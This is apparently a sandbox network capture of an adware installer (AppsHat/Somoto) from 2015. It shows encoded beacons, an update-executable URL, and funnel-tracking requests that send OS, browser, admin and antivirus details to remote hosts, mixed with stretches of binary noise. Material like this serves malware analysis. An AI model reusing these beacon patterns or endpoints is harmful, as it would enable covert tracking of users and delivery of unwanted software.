..=.......s../y.wa.h.0p$.Vf.J...JD..j5..........;...Y.....:k.tT=..x./.
...E..n...........$.s=.....)8p.E....B..c.$..Vj;.,.t.D|6d.B.lp.>Y.C.
........w.^|..Yx.P`N..j.RN.. ...~...Lok.....o..m%`,@,.....J.S...jM@...
..#...J..h..U^...`.RV.,^z..1.d/>?.u.\......{.r.l....M........e.&...
[.6<..M.......h.^...H.)..6.........../.O.]........W}. ...$..x9.9.i.
......)..~..b.T.........f...<8...C..$>YC............t..R.....`.*
[email protected]..`.....i...X.y...1.KQ...w,d.....4Oxn..
..... (....6.MY. .u...".Q.Fn.D..<..o..M.......&ZYJ.b5.24o...M...j..
$...l>.`rlx~..~F6Zh..>..`...i.y..-.e.....2.. ..CCkx...&.g.....j.
.Y......V.5...5.[....z.J.....R..x..u..i...|.....Y.s..-s.1.>...F....
.G...YWH.0.H.... .6=AQ.s.......%..3n.S.,..RY.D%...l.G^..Ny.QMb...>.
.=.1:h8.2.......%.Qv.=.g.i.........{.~.o....5.1g[...._ .C.o.=.....%...
[..[..i....Z/.z..i..UP.......8...sX..Y......iYI...C.(E7..S..9...H,L...
e..^ N.7...x.Qp.J.T....xz}.....&.%...<,. ..{s.=..Vp.........'./....
..Zv9.m..P.f..8....w...`..pJ....>a.'(....s'...l|t.....WO ..)3......
2.....F...@...#.v........29.#..w.-...nN..S"w..b........4.HY.......>
.v..?......>.#..\...sA.......W....^pS.z......9..%Q.l...7.}...[..*&l
t;  rq.L:....[.$7=.=B.mE-......)s..KM...........!..s..xa2...v3..uF...g
O.G'.B.e..-...z#..ck{`.v....`gx....Eg........`[email protected]...'.A....
.Z...LVAQd.q..( ...........6...6....P"..~.9......47..T.....IE..([.S.O.
|o.1{Ue..?C^-................T9P.pb..B#.....0_B....:#....v....8<
<<< skipped >>>


GET /16634.ashx?e=PcwT4QFtuPBwlKCj/kNh870oSfJOuBg0zZ0dT4XGkSyMDmRWpWBZ0CAvELRpepitjKjHf0fty0jaP8uCRyw5tKzZqKuvEwKkWLazpewXw1g ltfx41nMghQC drCF7eFTvYhKMprBayhLBQe2rbTMasyuDjWX8vLsJJPlhy2jdwTqcwBDTHruRy5x0Up4A3P HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:42 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:42 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......


GET /16634.ashx?e=eISsn0A7mAY luBT5UotGLi3muUffR3jrMHStbyX7lp4E7mrr1h80riKIFo3W8f23Wq7IsWCDz43mL7KBb4uQ/KiWnlKjT8nmtnRdFSmbGuENvzEMy06jATxIUcsgQ wO1MeTElIgRus2zM3OKTsdhhqfTLLUt3A0w03bJUd6M6gKlGaFWGmKjy7piDl3IHAus3QPIaZe1RJ/9u4mACIykdoRAj2suRrqzK4ONZfy8uwkk WHLaN3BOpzAENMeu5HLnHRSngDc8= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:46 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:46 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..



GET /webplayer/appshat/config.json HTTP/1.1
Accept: */*
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Cache-Control: max-age=0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.bigspeedpro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:38 GMT
Content-Type: application/json
Content-Length: 778
Last-Modified: Mon, 27 Jan 2014 15:16:30 GMT
Connection: close
ETag: "52e6784e-30a"
Accept-Ranges: bytes
{.."group-name": "AppsHat",.."program-name": "AppsHat",.."about-text":
 "Apps Hat\n(c) 2013 Somoto Ltd. All rights reserved\n\nTerms and Cond
itions:\nhXXp://VVV.appshat.com/eula/ahd\n\nPrivacy Policy:\nhXXp://ww
w.appshat.com/privacy/ahd",.."title-icon": "hXXp://VVV.appshat.com/ima
ges/16x16.ico",.."tray-icon": "hXXp://VVV.appshat.com/images/16x16.ico
",.."shortcut-icon": "hXXp://VVV.appshat.com/images/64x64.ico",.."unin
stall": "Apps Hat",.."url": "hXXp://VVV.appshat.com/home",.."width": 1
024,.."height": 795,.."cache": 86400,.."alwaysontop": false,.."program
-version": "2.13",.."start-on-windows": true,.."title": "Apps Hat",.."
tooltip": "Apps Hat",.."minimized": true,.."update-url" : "hXXp://VVV.
bigspeedpro.com/mirror/nerocrossrider/appshatmini/appshatmini_update.e
xe"..}....



GET /utility.gif?report=fdata&f=1&c=000805&i=100&n=init_start_funnel_step_name&rnd=1429400147 HTTP/1.1
Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: epnwtUVzkxSw3fu  PWSE1aqUDwO1fbIVEfWbsjuQrWZHzckhZDkw9r4YcE7FZB/
x-amz-request-id: 1F861762CE1A1A47
Date: Sat, 18 Apr 2015 23:35:48 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: epnwtU
VzkxSw3fu  PWSE1aqUDwO1fbIVEfWbsjuQrWZHzckhZDkw9r4YcE7FZB/..x-amz-requ
est-id: 1F861762CE1A1A47..Date: Sat, 18 Apr 2015 23:35:48 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /installer-error.gif?action=sesamy&app=70299&appver=0&ver=1_36_01_22&version_date=15-04-18&bic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&upi=f1455de99fbc9c9080e7ed2fd747836e&procid=C8E047339716492CBFDDEC56F18A5922PI&srcid=000805&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNEl3c210eWMxLCUlUElYR1VJRChhZmY9c210eWMmc3ViPTEmcHJvZHVjdD15dGE=,&browser=ie&browserver=10&default=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&curtime=&country=ua&aver=X&error=0&silent=1&os=7(64bit)&osbuild=7601&osprod=Windows 7 Professional N&ossp=Service Pack 1&osinstdt=1363796288&admin=1&type=17179873281&asw=0&asw2=1073750533&asw3=-2147475456&asw4=2048&crtnm=na&procstarttime=1429400147&procruntime=3&rnd=1429400150 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: QYWit4F6falU3iShxhz1E7pY50ml7KOFEGDxSbGeQ Qttvx5zYOQp0H2UlCUtujY
x-amz-request-id: CD61DFFBC7E97505
Date: Sat, 18 Apr 2015 23:35:51 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:13:52 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: QYWit4
F6falU3iShxhz1E7pY50ml7KOFEGDxSbGeQ Qttvx5zYOQp0H2UlCUtujY..x-amz-requ
est-id: CD61DFFBC7E97505..Date: Sat, 18 Apr 2015 23:35:51 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Wed, 01 Apr 2015 13:13:52 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000805&i=200&n=init_end_funnel_step_name&rnd=1429400150 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: ury8ca6zj7pkA8VmtJGAB xfmEXvx KiTlZshVILYTqXuQ0IbDm5t FK5iPyQ7EP
x-amz-request-id: F9259D6CF98D0F36
Date: Sat, 18 Apr 2015 23:35:51 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000805&i=300&n=deploy_start_funnel_step_name&rnd=1429400151 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: zPS6nDJOTJLGaV lP4u20WZpn2GXS4Ow JiN1SkioGoRdrxzHqXyz5iA4K6qeddp
x-amz-request-id: 47001552EFD59FBC
Date: Sat, 18 Apr 2015 23:35:52 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: zPS6nD
JOTJLGaV lP4u20WZpn2GXS4Ow JiN1SkioGoRdrxzHqXyz5iA4K6qeddp..x-amz-requ
est-id: 47001552EFD59FBC..Date: Sat, 18 Apr 2015 23:35:52 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000805&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1429400153 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: hn s5Dj0YwLg55MHo2payfws3wkqG1p76GPWAGdGtrys1Rbi8STSFfoNEMxcnMOk
x-amz-request-id: CCC383CB12B4B6E5
Date: Sat, 18 Apr 2015 23:35:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: hn s5D
j0YwLg55MHo2payfws3wkqG1p76GPWAGdGtrys1Rbi8STSFfoNEMxcnMOk..x-amz-requ
est-id: CCC383CB12B4B6E5..Date: Sat, 18 Apr 2015 23:35:54 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000805&i=500&n=deploy_notification_start_funnel_step_name&rnd=1429400153 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: GA/slKtVdLNlZUrzItW c4jF6vENg2byPKQKwYXXkbe2pknhvPjZkUEYhuFMBCpH
x-amz-request-id: 1AFF15766427B9AC
Date: Sat, 18 Apr 2015 23:35:55 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000805&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1429400154 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: fiQbIc1nppFzGHbPWtwtrh622/fpb2msQBptBdGeDxdJYRdt2VxSjMgtfScle/Aa
x-amz-request-id: 9771307069BDFCEA
Date: Sat, 18 Apr 2015 23:35:55 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000805&i=700&n=deploy_ch_start_funnel_step_name&rnd=1429400154 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: sgdpLdMKrpBKTxnUUhA4AVWTMGzn5o0MTDsl9BRPHywx2A4W/HDJUVChgZKlf/sj
x-amz-request-id: D4CA87D7271B2E37
Date: Sat, 18 Apr 2015 23:35:55 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000805&i=800&n=deploy_nova_start_funnel_step_name&rnd=1429400154 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: ughaiqPKizBWH/1WF7VbAQC/AA0qGDw4lb3VQupk1QyHHql30ynMbUcd65y3iYYg
x-amz-request-id: 1C3E9C5CBE28EB7B
Date: Sat, 18 Apr 2015 23:35:55 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000805&i=900&n=deploy_ff_start_funnel_step_name&rnd=1429400154 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: GpASY8CCtN8p2RoMwFF6fXC1vX38CaTvD/evKGxvRYHzPbsysy24nxBG906aac34
x-amz-request-id: 2AB01C9DF0FFAE0C
Date: Sat, 18 Apr 2015 23:35:55 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: GpASY8
CCtN8p2RoMwFF6fXC1vX38CaTvD/evKGxvRYHzPbsysy24nxBG906aac34..x-amz-requ
est-id: 2AB01C9DF0FFAE0C..Date: Sat, 18 Apr 2015 23:35:55 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000805&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1429400158 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: /zysqkgg25NfcL9X7h1DJ22f087SSaj9lH6YEuJk/t3blyJG6dq8z3agUy/GQRY9
x-amz-request-id: 92FC18B6FD89F0D7
Date: Sat, 18 Apr 2015 23:35:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000805&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1429400158 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: /rrGTO0rDvLPnEMvzwa3P2j3HAy WMk3ntwFAhbxT07XjxONBoymZvemAYrd95rp
x-amz-request-id: 0530B8A43ACC4433
Date: Sat, 18 Apr 2015 23:35:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000805&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1429400158 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: xH7mh5/qQ3gsJNild2ZYcJ73KDtaKUYqAo8d4N/HQ2g8DvTXhUsQ1nzZxK/Bpy6F
x-amz-request-id: 5EBB15764E8B4ECD
Date: Sat, 18 Apr 2015 23:35:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: xH7mh5
/qQ3gsJNild2ZYcJ73KDtaKUYqAo8d4N/HQ2g8DvTXhUsQ1nzZxK/Bpy6F..x-amz-requ
est-id: 5EBB15764E8B4ECD..Date: Sat, 18 Apr 2015 23:35:59 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000805&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1429400159 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: IxpoB3NbyWrrvEULh3F3L9tXRXZ3z6FAZfPiUL5mj3sudLmi1oAEoJkNVNPqwBVe
x-amz-request-id: 3675ED52EEBA3353
Date: Sat, 18 Apr 2015 23:36:00 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000805&i=10000&n=deploy_end_funnel_step_name&rnd=1429400159 HTTP/1.1


Host: errors.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: FH6QBLJv/H5mK0Pad5KKw6dtxha1vhbZxQzuttMk3UVspb1nNB2sTtfdnwB01PA8
x-amz-request-id: 057E002B7BE5B031
Date: Sat, 18 Apr 2015 23:36:00 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: FH6QBL
Jv/H5mK0Pad5KKw6dtxha1vhbZxQzuttMk3UVspb1nNB2sTtfdnwB01PA8..x-amz-requ
est-id: 057E002B7BE5B031..Date: Sat, 18 Apr 2015 23:36:00 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Wed, 01 Apr 2015 13:14:03 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;..



GET /v4/sof-windowspm/?action0=xa.geoip&action1=visit&action2=install&update0=ref,wpmvt&update1=nation,us&update2=language,en HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 18 Apr 2015 23:36:25 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
3d..{"stats":"error","time":"0.07 ms","message":"uid is not set"}..0..
HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Sat, 18 Apr 2015 23:36:25
 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunk
ed..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v
4..3d..{"stats":"error","time":"0.07 ms","message":"uid is not set"}..
0..



GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD/yl6nWPkczAQUe1tFz6/Oy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS+zcBkvzl4= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.thawte.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1503
content-transfer-encoding: binary
Cache-Control: max-age=598963, public, no-transform, must-revalidate
Last-Modified: Sat, 18 Apr 2015 22:00:00 GMT
Expires: Sat, 25 Apr 2015 22:00:00 GMT
Date: Sat, 18 Apr 2015 23:38:21 GMT
Connection: keep-alive
0..........0..... .....0......0...0......&Km...."....}....,.c..2015041
8220000Z0s0q0I0... ........0..k....&..p..^.X.....{[E....z.1..j..F.WHP.
.G.Mxs..../.p./.^....20150418220000Z....20150425220000Z0...*.H........
.....D`]1.;...>.....i..Wv.vC...u7|..0.C.wyr!....K...1<...^.v.z..
...5...{.4...e..........7qzm[.G.h...l....x.>.l.^.K^a.....i..Af.....
.%o......8..t....O... x..S3.l.#.:S.&.[5HtJ.tkl.'.. ...B...).....Zv...G
H..)....'7.%[email protected]..@'.k.t.*....i...Q(}.........l.}4.....0...0.
..0............I...*....^n...0...*.H........0..1.0...U....US1.0...U...
.thawte, Inc.1(0&..U....Certification Services Division1806..U.../(c) 
2006 thawte, Inc. - For authorized use only1.0...U....thawte Primary R
oot CA0...141202000000Z..151216235959Z0_1.0...U....US1.0...U....thawte
, Inc.1907..U...0thawte Primary Root OCSP Responder Certificate 30.."0
...*.H.............0.........x...F83..,.D.,2D.;JGc.|_.k.....B.7.....G}
.M.s.....S.i.Uu.h.Aq..v...4:l..U.......T7l...~vl...r....{*..........V.
o..8|.B..^.a.. ...z....x..s...\[Y....<....'> ..YC..7.zVk.$...o3.
.kao]c...>C./bPX.......I..Oc.....NN......g.....,/..]......qN.....V!
<.3.)...y#.........i0g0...U.%..0... .......0... .....0......0...U..
.....0.0...U...........0!..U....0...0.1.0...U....TGV-B-2770...*.H.....
...........lt..\..z. ..N.f.!.S5d?J.&....r...D........L.`.s.p...HC.L.8f
... .........GA7......P..Z.%.../............z.n.6~I...].).....W...W\|.
uya..:...^...hW..7.Z.uc.'....:.xL...HS.....>.........5......%....3S
....h........U....o.C.\.t.....G.._.C0(l.E9..6UTxg.gF ..;...
<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9+WQCtWAQU1A1lP3q9NMb+R+dMDcC98t4Vq3ECEBILJd3le4hjatTZfSO5nIg= HTTP/1.1


Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.thawte.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1396
content-transfer-encoding: binary
Cache-Control: max-age=496797, public, no-transform, must-revalidate
Last-Modified: Fri, 17 Apr 2015 17:35:05 GMT
Expires: Fri, 24 Apr 2015 17:35:05 GMT
Date: Sat, 18 Apr 2015 23:38:21 GMT
Connection: keep-alive
0..p......i0..e.. .....0.....V0..R0......Qw.}`[email protected]
7173505Z0s0q0I0... ........l....r.vdv0..*.~Y..X....e?z.4..G.L.......q.
...%..{.cj..}#.......20150417173505Z....20150424173505Z0...*.H........
.....I....1.Y.o|.?<...f[C.ib.....'...k_.Vo.Fa[..9.f}.v.m........A'.
....t6.5......(........J$xm..i...WKO...i..3.;l%M.1.. H.....J.o...fm...
c. ....#[email protected].'...w92.L%...I.M.......S#.l....2.
.{v.a.Yn....UqFqS..2.Bhzh._.4....k.#..h.B........FO..1....0...0...0..y
.......^..........N...)0...*.H........0J1.0...U....US1.0...U....Thawte
, Inc.1$0"..U....Thawte Code Signing CA - G20...150303000000Z..1506012
35959Z0Y1.0...U....US1.0...U....Thawte, Inc.1301..U...*Thawte Code Sig
ning CA - G2 OCSP Responder0.."0...*.H.............0............).Z...
....O.~.l...,\.3.".'.'W .ih./..}OA...K...HJd....K^..<.....-.rWJ.j.U
.._......W.../.6....J.y.u-.\...2..U.52B.>...=F...RbR.y.zm.......{b.
bj....Y..J..m...*=.^......V.}p......rmA......9.L ...{?.g.-Y...........
.8...k.$.:.5..6#4..F.#....t.B.8.O)'F.p).........d0b0...U....0.0...U.%.
.0... .......0...U........0... .....0......0"..U....0...0.1.0...U....T
GV-B-32450...*.H..............C.....8.Aw.{....`...y1N...W4M..M.J.3~..7
#}..X..:x..5....$...Z^%.?6..e...}I.)....... .A.w......_...B..j.T..Yu.o
.....g....H....q.Ju.SA`K.....~..O_.....S....I>..O.X..E.......]...y.
.L..F....K......../...._XSk6.:a};.?`...:^.....p....4Z.3L;.......t....&
gt;.....j....
<<< skipped >>>


GET /16669.ashx?e=QHucCbLl /ZRN3UqGh1U L0oSfJOuBg06UlKwaiBj2 MDmRWpWBZ0PxJo1EJGyYRjOluN4MfK81xebCnHQAai QVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlGfaDF4SP6aVUeZLRmueCpr 7rPtSKe/ E4aMYDRhnLflW3vxOK wUbIROPie2z407nXsJR6HRCLBPEhRyyBD7B8meHxUMSBFKVM1FYzK8CTpSqMO4CK Ynib 8lcO8XYbxKtVwphCE/yhsDDHNIJ6TYBMbHlkM59hB5aSy JFSFlAN A2uK7PKHyHmjditetm/6pH veTXixuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJeK7a1soWlgbXd/rihenux9E5qLiEdalnTkFRMCFkWSPRZtwp8OumXRtkYVxBhYUpQUbFx3f954sg== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:36:02 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


